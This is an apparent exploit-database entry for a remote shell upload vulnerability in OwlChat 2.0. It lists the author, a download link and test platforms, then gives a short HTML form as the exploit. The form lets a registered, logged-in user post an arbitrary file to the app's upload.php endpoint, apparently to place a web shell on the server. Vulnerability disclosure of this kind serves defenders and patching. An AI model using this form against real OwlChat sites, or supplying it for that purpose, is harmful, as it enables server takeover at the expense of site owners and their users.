OwlChat version 2.0 suffers from a remote shell upload vulnerability.
05cb90d1713d9b920debded62e0cf99a# Exploit Title: OwlChat Remote Shell Upload Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: [email protected]
# Download Link:
http://dl.20script.ir/script/chat/Owl-Chat-v2.0%5Bwww.20script.ir%5D.zip
# Tested on: Windows 10 / Kali Linux
# Category: WebApps
# Video : https://youtu.be/-H2jlRtVaJY
#
*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
** for use this exploit you need register and login on target **
exploit:
<html>
<body>
<form action="http://localhost:8080/owlchat//actions/files/upload.php"
method="post" enctype="multipart/form-data">
Select file to upload:
<input type="file" name="file" id="fileToUpload">
<input type="submit" value="Upload Image" name="submit">
</form>
</body>
</html>